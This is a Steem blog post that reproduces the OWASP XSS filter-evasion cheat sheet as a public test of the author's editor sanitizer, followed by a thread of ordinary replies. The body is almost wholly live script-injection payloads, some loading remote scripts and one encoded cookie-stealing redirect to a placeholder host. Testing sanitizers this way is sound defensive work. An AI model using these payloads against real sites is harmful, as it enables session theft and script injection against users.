create account

Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet by steemchiller

View this thread on: hive.blogpeakd.comecency.com
steemworld · @steemchiller · (edited)
$54.56
Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet
<center>https://cdn.steemitimages.com/DQmbjbs2qYUDx7379aBgEMBt92efAowZtZ9mMdJ65RNrZxy/hacker-1944688_1280.jpg</center>

https://steemitimages.com/DQmXA9RBqr2qRTbWpcnvGDv38v9v6gak6WotkLMMUZxeERk/hr_thin.png

This post acts as a public XSS Security Test for my upcoming Post Editor on SteemWorld. Of course, it can be used to test against many different XSS attacks on other platforms as well. If you should see a message stating 'XSS', the Steem platform you are using may not be secure and the developers need to be contacted immediately.

Since I recently finished the Sanitizer Module of my HTML Parser for the Editor, it's now time to test different scripting attacks and I think it is a good idea to have a post to be able to easily test any coming changes in future. A few things might still be added in the next few days.

I've spent some time checking the official <a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet">XSS Filter Evasion Cheat Sheet</a> (last revision: 02/23/2019) and included the relevant attacks in this post.

https://steemitimages.com/DQmXA9RBqr2qRTbWpcnvGDv38v9v6gak6WotkLMMUZxeERk/hr_thin.png 

~~~
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
~~~
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>

---
~~~
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
~~~
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

---
~~~
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
~~~
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>

---
~~~
<IMG SRC="javascript:alert('XSS');">
~~~
<IMG SRC="javascript:alert('XSS');">

---
~~~
<IMG SRC=javascript:alert('XSS')>
~~~
<IMG SRC=javascript:alert('XSS')>

---
~~~
<IMG SRC=JaVaScRiPt:alert('XSS')>
~~~
<IMG SRC=JaVaScRiPt:alert('XSS')>

---
~~~
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
~~~
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

---
~~~
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
~~~
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

---
~~~
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
~~~
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

---
~~~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
~~~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

---
~~~
<IMG SRC=# onmouseover="alert('xxs')">
~~~
<IMG SRC=# onmouseover="alert('xxs')">

---
~~~
<IMG SRC= onmouseover="alert('xxs')">
~~~
<IMG SRC= onmouseover="alert('xxs')">

---
~~~
<IMG onmouseover="alert('xxs')">
~~~
<IMG onmouseover="alert('xxs')">

---
~~~
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
~~~
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

---
~~~
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
~~~
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">

---
~~~
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
~~~
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>

---
~~~
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
~~~
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

---
~~~
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
~~~
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

---
~~~
<IMG SRC="jav	ascript:alert('XSS');">
~~~
<IMG SRC="jav	ascript:alert('XSS');">

---
~~~
<IMG SRC="jav&#x09;ascript:alert('XSS');">
~~~
<IMG SRC="jav&#x09;ascript:alert('XSS');">

---
~~~
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
~~~
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

---
~~~
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
~~~
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

---
~~~
<IMG SRC=" &#14;  javascript:alert('XSS');">
~~~
<IMG SRC=" &#14;  javascript:alert('XSS');">

---
~~~
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>
~~~
<SCRIPT/XSS SRC="http://xss.rocks/xss.js"></SCRIPT>

---
~~~
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
~~~
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

---
~~~
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>
~~~
<SCRIPT/SRC="http://xss.rocks/xss.js"></SCRIPT>

---
~~~
<<SCRIPT>alert("XSS");//<</SCRIPT>
~~~
<<SCRIPT>alert("XSS");//<</SCRIPT>

---
~~~
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
~~~
<SCRIPT SRC=http://xss.rocks/xss.js?< B >

---
~~~
<SCRIPT SRC=//xss.rocks/.j>
~~~
<SCRIPT SRC=//xss.rocks/.j>

---
~~~
<IMG SRC="javascript:alert('XSS')"
~~~
<IMG SRC="javascript:alert('XSS')"

---
~~~
<iframe src=http://xss.rocks/scriptlet.html <
~~~

---
~~~
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
~~~
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

---
~~~
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
~~~
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

---
~~~
<BODY BACKGROUND="javascript:alert('XSS')">
~~~
<BODY BACKGROUND="javascript:alert('XSS')">

---
~~~
<IMG DYNSRC="javascript:alert('XSS')">
~~~
<IMG DYNSRC="javascript:alert('XSS')">

---
~~~
<IMG LOWSRC="javascript:alert('XSS')">
~~~
<IMG LOWSRC="javascript:alert('XSS')">

---
~~~
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
~~~
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
</ul>

---
~~~
<IMG SRC='vbscript:msgbox("XSS")'>
~~~
<IMG SRC='vbscript:msgbox("XSS")'>

---
~~~
<IMG SRC="livescript:[code]">
~~~
<IMG SRC="livescript:[code]">

---
~~~
<svg/onload=alert('XSS')>
~~~
<svg/onload=alert('XSS')>

---
~~~
<BODY ONLOAD=alert('XSS')>
~~~
<BODY ONLOAD=alert('XSS')>

---
~~~
<BGSOUND SRC="javascript:alert('XSS');">
~~~
<BGSOUND SRC="javascript:alert('XSS');">

---
~~~
<BR SIZE="&{alert('XSS')}">
~~~
<BR SIZE="&{alert('XSS')}">

---
~~~
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
~~~
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

---
~~~
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">
~~~
<LINK REL="stylesheet" HREF="http://xss.rocks/xss.css">

---
~~~
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>
~~~
<STYLE>@import'http://xss.rocks/xss.css';</STYLE>

---
~~~
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">
~~~
<META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet">

---
~~~
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
~~~
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>

---
~~~
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
~~~
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

---
~~~
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
~~~
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

---
~~~
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
~~~
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
</a>
---
~~~
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
~~~
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

---
~~~
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
~~~
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

---
~~~
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
~~~
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

---
~~~
<XSS STYLE="xss:expression(alert('XSS'))">
~~~
<XSS STYLE="xss:expression(alert('XSS'))">

---
~~~
<XSS STYLE="behavior: url(xss.htc);">
~~~
<XSS STYLE="behavior: url(xss.htc);">

---
~~~
¼script¾alert(¢XSS¢)¼/script¾
~~~
¼script¾alert(¢XSS¢)¼/script¾

---
~~~
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
~~~
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

---
~~~
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
~~~
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

---
~~~
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
~~~
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

---
~~~
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
~~~
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

---
~~~
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
~~~
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

---
~~~
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
~~~
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

---
~~~
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
~~~
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>

---
~~~
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
~~~
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>

---
~~~
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
~~~
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

---
~~~
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>
~~~
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></DIV>

---
~~~
<DIV STYLE="width: expression(alert('XSS'));"></DIV>
~~~
<DIV STYLE="width: expression(alert('XSS'));"></DIV>

---
~~~
<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->
~~~
<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->

---
~~~
<BASE HREF="javascript:alert('XSS');//">
~~~
<BASE HREF="javascript:alert('XSS');//">

---
~~~
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>
~~~
<OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT>

---
~~~
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
~~~
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

---
~~~
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
~~~
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

---
~~~
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>
~~~
<SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT>

---
~~~
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">
~~~
<img onload="eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))">

https://steemitimages.com/DQmXA9RBqr2qRTbWpcnvGDv38v9v6gak6WotkLMMUZxeERk/hr_thin.png

If you are a developer and you should need help in protecting your app against such attacks, feel free to leave me a message ;)

Just to be safe,

https://steemitimages.com/DQmarYCHGSBms38CSwf8Be3n56RN16nz8MS6MTSV2jX3TfT/chiller-footer-sh-400x90.png
👍  , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , and 760 others
properties (23)
authorsteemchiller
permlinksteem-platform-security-test
categorysteemworld
json_metadata{"app":"sw/0.1","format":"markdown","tags":["steemworld","dev","security","xss","owasp"],"image":["https://cdn.steemitimages.com/DQmbjbs2qYUDx7379aBgEMBt92efAowZtZ9mMdJ65RNrZxy/hacker-1944688_1280.jpg"],"links":["https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet"]}
created2019-03-08 10:50:15
last_update2019-03-08 14:32:12
depth0
children15
last_payout2019-03-15 10:50:15
cashout_time1969-12-31 23:59:59
total_payout_value42.322 HBD
curator_payout_value12.240 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length12,546
author_reputation219,937,669,501,793
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,913,467
net_rshares75,086,900,949,710
author_curate_reward""
vote details (824)
@amico ·
$0.07
___
### <center> Everything is okay! 👌 </center> 
___
You received an automatic vote, because I believe in you and I love what you create! ;) 

A huge hug from @amico! 🤗

<sup><sup><sup><sup> I love promoting !sbi status </sup></sup></sup></sup>
👍  
properties (23)
authoramico
permlinkre-steem-platform-security-test-20190308t122933z
categorysteemworld
json_metadata"{"app": "rewarding/0.1.2"}"
created2019-03-08 12:29:36
last_update2019-03-08 12:29:36
depth1
children1
last_payout2019-03-15 12:29:36
cashout_time1969-12-31 23:59:59
total_payout_value0.050 HBD
curator_payout_value0.016 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length252
author_reputation51,076,240,298,517
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,918,046
net_rshares90,878,378,540
author_curate_reward""
vote details (1)
@sbi4 ·
$0.11
Hi @amico!

* you have 140 units and 510 bonus units
* your rshares balance is 2513443120490 or 1.556 $
* your next SBI upvote is predicted to be 0.311 $
<br>
Did you know Steem Basic Income has a [Quality Policy](https://steemit.com/steem/@steembasicincome/sbi-responsible-voting-and-following)?
👍  , , , , ,
properties (23)
authorsbi4
permlinkre-re-steem-platform-security-test-20190308t122933z-20190308t123133z
categorysteemworld
json_metadata"{"app": "steembasicincome/0.1.1"}"
created2019-03-08 12:31:33
last_update2019-03-08 12:31:33
depth2
children0
last_payout2019-03-15 12:31:33
cashout_time1969-12-31 23:59:59
total_payout_value0.088 HBD
curator_payout_value0.023 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length296
author_reputation6,270,258,382,792
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,918,177
net_rshares157,081,975,636
author_curate_reward""
vote details (6)
@anshul1 ·
$0.07
Yes, there must be a proper security to ensure that the apps should be safe.
👍  
properties (23)
authoranshul1
permlinkre-steemchiller-steem-platform-security-test-20190308t115420782z
categorysteemworld
json_metadata{"tags":["steemworld"],"app":"steemit/0.1"}
created2019-03-08 11:54:27
last_update2019-03-08 11:54:27
depth1
children0
last_payout2019-03-15 11:54:27
cashout_time1969-12-31 23:59:59
total_payout_value0.056 HBD
curator_payout_value0.018 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length76
author_reputation409,081,500,793
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,916,088
net_rshares100,856,289,936
author_curate_reward""
vote details (1)
@brittandjosie · 
I used steemworld today for looking up Some info for my blog today so thanks for making it easier with steemworld
Gr. Britt
properties (22)
authorbrittandjosie
permlinkre-steemchiller-steem-platform-security-test-20190312t151158330z
categorysteemworld
json_metadata{"tags":["steemworld"],"app":"steemit/0.1"}
created2019-03-12 15:11:57
last_update2019-03-12 15:11:57
depth1
children0
last_payout2019-03-19 15:11:57
cashout_time1969-12-31 23:59:59
total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length123
author_reputation525,661,217,955,513
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id81,148,227
net_rshares0
@curationhelper · 
You just rose by 20.17% upvote from @curationhelper courtesy of @der-prophet
properties (22)
authorcurationhelper
permlinkre-steem-platform-security-test-20190308t133257
categorysteemworld
json_metadata""
created2019-03-08 13:32:57
last_update2019-03-08 13:32:57
depth1
children0
last_payout2019-03-15 13:32:57
cashout_time1969-12-31 23:59:59
total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length76
author_reputation7,557,527,744,634
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,921,076
net_rshares0
@gillianpearce ·
$0.03
On a completely different note . . . I've noticed that when I edit a post, if it has a self vote steemworld counts it again. Is it possible to make it so it the vote only gets counted once? The way it works currently means my self vote level shows as higher than it truly is.

No idea how easy or not that is to do but thought I'd mention it.

Thanks for all the great work you do. &#128522;
👍  ,
properties (23)
authorgillianpearce
permlinkre-steemchiller-steem-platform-security-test-20190308t113235393z
categorysteemworld
json_metadata{"tags":["steemworld"],"app":"steemit/0.1"}
created2019-03-08 11:32:36
last_update2019-03-08 11:32:36
depth1
children2
last_payout2019-03-15 11:32:36
cashout_time1969-12-31 23:59:59
total_payout_value0.026 HBD
curator_payout_value0.008 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length391
author_reputation60,690,932,902,891
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,915,031
net_rshares48,446,636,629
author_curate_reward""
vote details (2)
@steemchiller ·
$1.03
I checked your self-vote rate and it seems to be correct. You created 7 posts and voted all of them with 100% (I couldn't even find an edited post). Since you only vote yourself and @artysteps (Looks like another account by you) with 100% and you vote all other accounts with 10-50%, I think your self-vote rate should in fact be much higher (at least 45%).

Keep in mind that on some day you might get flagged heavily by some whales for that ;)
👍  , , , , , ,
properties (23)
authorsteemchiller
permlinkre-gillianpearce-re-steemchiller-steem-platform-security-test-20190308t151448711z
categorysteemworld
json_metadata{"tags":["steemworld"],"users":["artysteps"],"app":"steemit/0.1"}
created2019-03-08 15:14:48
last_update2019-03-08 15:14:48
depth2
children1
last_payout2019-03-15 15:14:48
cashout_time1969-12-31 23:59:59
total_payout_value0.781 HBD
curator_payout_value0.248 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length445
author_reputation219,937,669,501,793
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,925,134
net_rshares1,395,348,999,585
author_curate_reward""
vote details (7)
@gillianpearce · 
Hmmm. Ok. But I'm not sure why you can't see any edited some posts I definitely corrected a couple of spelling mistakes. Not important though. Thanks for checking.
properties (22)
authorgillianpearce
permlinkre-steemchiller-re-gillianpearce-re-steemchiller-steem-platform-security-test-20190308t151914831z
categorysteemworld
json_metadata{"tags":["steemworld"],"app":"steemit/0.1"}
created2019-03-08 15:19:15
last_update2019-03-08 15:19:15
depth3
children0
last_payout2019-03-15 15:19:15
cashout_time1969-12-31 23:59:59
total_payout_value0.000 HBD
curator_payout_value0.000 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length163
author_reputation60,690,932,902,891
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,925,309
net_rshares0
@luegenbaron ·
$0.10
Ich verstehe zwar nicht komplett - __trotzdem danke dir für deine Arbeit! ;)__

Posted using [Partiko Android](https://steemit.com/@partiko-android)
👍  
properties (23)
authorluegenbaron
permlinkluegenbaron-re-steemchiller-steem-platform-security-test-20190308t110307533z
categorysteemworld
json_metadata{"app":"partiko","client":"android"}
created2019-03-08 11:03:09
last_update2019-03-08 11:03:09
depth1
children0
last_payout2019-03-15 11:03:09
cashout_time1969-12-31 23:59:59
total_payout_value0.078 HBD
curator_payout_value0.025 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length148
author_reputation27,465,249,085,978
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,913,888
net_rshares138,882,654,096
author_curate_reward""
vote details (1)
@meins0815 ·
$0.11
Der erste (fach-)chinesische Post den ich komplett durchgescrollt habe :))
könnte aber auch klingonisch oder romulanisch sein!

LG
👍  
properties (23)
authormeins0815
permlinkre-steemchiller-steem-platform-security-test-20190308t114453399z
categorysteemworld
json_metadata{"community":"busy","app":"busy/2.5.6","format":"markdown","tags":["steemworld"],"users":[],"links":[],"image":[]}
created2019-03-08 11:44:54
last_update2019-03-08 11:44:54
depth1
children0
last_payout2019-03-15 11:44:54
cashout_time1969-12-31 23:59:59
total_payout_value0.079 HBD
curator_payout_value0.026 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length130
author_reputation118,602,882,924,715
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,915,614
net_rshares141,712,928,619
author_curate_reward""
vote details (1)
@mellofello ·
$0.07
Thanks keeping us safe.
👍  
properties (23)
authormellofello
permlinkre-steemchiller-steem-platform-security-test-20190308t205055142z
categorysteemworld
json_metadata{"tags":["steemworld"],"app":"steemit/0.1"}
created2019-03-08 20:50:54
last_update2019-03-08 20:50:54
depth1
children0
last_payout2019-03-15 20:50:54
cashout_time1969-12-31 23:59:59
total_payout_value0.056 HBD
curator_payout_value0.018 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length23
author_reputation67,078,537,643,577
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,935,988
net_rshares102,673,807,139
author_curate_reward""
vote details (1)
@nigelmarkdias · (edited)
$0.06
Great work. @SteemChiller
![902B6461-4C48-4342-ABE3-AC0066F1B54C.gif](https://cdn.steemitimages.com/DQmYbDgNrV7GLMyoxPiNs6SwwV8n6me3MKmtErBkgtTYsAV/902B6461-4C48-4342-ABE3-AC0066F1B54C.gif)
Resteemed.
Posted using [Partiko iOS](https://steemit.com/@partiko-ios)
👍  ,
properties (23)
authornigelmarkdias
permlinknigelmarkdias-re-steemchiller-steem-platform-security-test-20190308t143223070z
categorysteemworld
json_metadata{"app":"steemit/0.1","client":"ios","tags":["steemworld"],"users":["steemchiller"],"image":["https://cdn.steemitimages.com/DQmYbDgNrV7GLMyoxPiNs6SwwV8n6me3MKmtErBkgtTYsAV/902B6461-4C48-4342-ABE3-AC0066F1B54C.gif"],"links":["https://steemit.com/@partiko-ios"]}
created2019-03-08 14:32:24
last_update2019-03-08 18:10:09
depth1
children0
last_payout2019-03-15 14:32:24
cashout_time1969-12-31 23:59:59
total_payout_value0.048 HBD
curator_payout_value0.015 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length261
author_reputation47,068,459,201,342
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,923,344
net_rshares86,124,767,798
author_curate_reward""
vote details (2)
@pennsif ·
$0.07
This post has been included in the latest edition of  [**SoS Daily News**](https://steemit.com/steem/@pennsif/sos-daily-news-news-about-the-state-of-steem-8-march-2019) - a digest of all the latest news on the Steem blockchain.
👍  
properties (23)
authorpennsif
permlinkre-steemchiller-steem-platform-security-test-20190309t205251276z
categorysteemworld
json_metadata{"tags":["steemworld"],"links":["https://steemit.com/steem/@pennsif/sos-daily-news-news-about-the-state-of-steem-8-march-2019"],"app":"steemit/0.1"}
created2019-03-09 20:52:54
last_update2019-03-09 20:52:54
depth1
children0
last_payout2019-03-16 20:52:54
cashout_time1969-12-31 23:59:59
total_payout_value0.054 HBD
curator_payout_value0.018 HBD
pending_payout_value0.000 HBD
promoted0.000 HBD
body_length227
author_reputation636,410,097,572,565
root_title"Steem Platform Security Test / OWASP - XSS Filter Evasion Cheat Sheet"
beneficiaries[]
max_accepted_payout1,000,000.000 HBD
percent_hbd10,000
post_id80,980,984
net_rshares101,135,811,131
author_curate_reward""
vote details (1)
@steem-ua · 
#### Hi @steemchiller!

Your post was upvoted by @steem-ua, new Steem dApp, using UserAuthority for algorithmic post curation!
Your **UA** account score is currently 6.244 which ranks you at **#236** across all Steem accounts.
Your rank has improved 1 places in the last three days (old rank 237).

In our last Algorithmic Curation Round, consisting of 182 contributions, your post is ranked at **#12**.
##### Evaluation of your UA score:

* You've built up a nice network.
* The readers appreciate your great work!
* Good user engagement!


**Feel free to join our [@steem-ua Discord server](https://discord.gg/KpBNYGz)**
properties (22)
authorsteem-ua
permlinkre-steem-platform-security-test-20190311t122702z
categorysteemworld
json_metadata"{"app": "beem/0.20.18"}"
created2019-03-11 12:27:03
last_update2019-03-11 12:27:03
depth1
children0
last_payout2019-03-18 12:27:03
cashout_time1969-12-31 23:59:59
